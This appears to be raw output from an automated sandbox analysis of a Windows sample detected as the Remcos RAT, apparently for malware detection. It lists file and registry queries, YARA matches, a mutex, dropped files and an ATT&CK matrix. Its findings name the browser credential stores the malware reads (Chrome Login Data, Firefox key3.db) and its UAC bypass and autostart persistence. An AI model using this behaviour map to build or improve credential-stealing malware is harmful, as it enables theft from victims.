                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Users\user\AppData\Roaming\Graias\graias.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00434020 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_00434020
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_0041A7B2 GetUserNameW,3_2_0041A7B2
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: 3_2_00448067 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_00448067
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data3_2_0040B21B
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\3_2_0040B335
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: \key3.db3_2_0040B335

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-O844B9Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.4425c30.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.4XYAW8PbZH.exe.39e2d20.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.4XYAW8PbZH.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000004425000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1832995156.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 6976, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 4XYAW8PbZH.exe PID: 2816, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\graias\logs.dat, type: DROPPED
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeCode function: cmd.exe3_2_00405042

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		12
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API                		1
                Windows Service                		1
                Bypass User Account Control                		1
                Deobfuscate/Decode Files or Information                		211
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol211
                Input Capture                		21
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter                		11
                Registry Run Keys / Startup Folder                		1
                Access Token Manipulation                		3
                Obfuscated Files or Information                		2
                Credentials In Files                		1
                System Service Discovery                		SMB/Windows Admin Shares3
                Clipboard Data                		1
                Non-Standard Port                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution                		Login Hook1
                Windows Service                		12
                Software Packing                		NTDS4
                File and Directory Discovery                		Distributed Component Object ModelInput Capture1
                Remote Access Software                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script322
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets44
                System Information Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                Registry Run Keys / Startup Folder                		1
                Bypass User Account Control                		Cached Domain Credentials161
                Security Software Discovery                		VNCGUI Input Capture13
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync61
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job61
                Virtualization/Sandbox Evasion                		Proc Filesystem3
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron322
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1584203 Sample: 4XYAW8PbZH.exe Startdate: 04/01/2025 Architecture: WINDOWS Score: 100 98 www.google.com 2->98 100 mdec.nelreports.net 2->100 102 geoplugin.net 2->102 124 Suricata IDS alerts for network traffic 2->124 126 Found malware configuration 2->126 128 Malicious sample detected (through community Yara rule) 2->128 130 12 other signatures 2->130 12 4XYAW8PbZH.exe 4 2->12         started        signatures3 process4 file5 94 C:\Users\user\AppData\...\4XYAW8PbZH.exe.log, ASCII 12->94 dropped 140 Contains functionality to bypass UAC (CMSTPLUA) 12->140 142 Contains functionalty to change the wallpaper 12->142 144 Contains functionality to steal Chrome passwords or cookies 12->144 146 5 other signatures 12->146 16 4XYAW8PbZH.exe 1 4 12->16         started        20 powershell.exe 23 12->20         started        22 WerFault.exe 21 16 12->22         started        signatures6 process7 file8 88 C:\Users\user\AppData\Roaming\...\graias.exe, PE32 16->88 dropped 90 C:\Users\user\...\graias.exe:Zone.Identifier, ASCII 16->90 dropped 118 Detected Remcos RAT 16->118 120 Creates autostart registry keys with suspicious names 16->120 24 graias.exe 4 16->24         started        122 Loading BitLocker 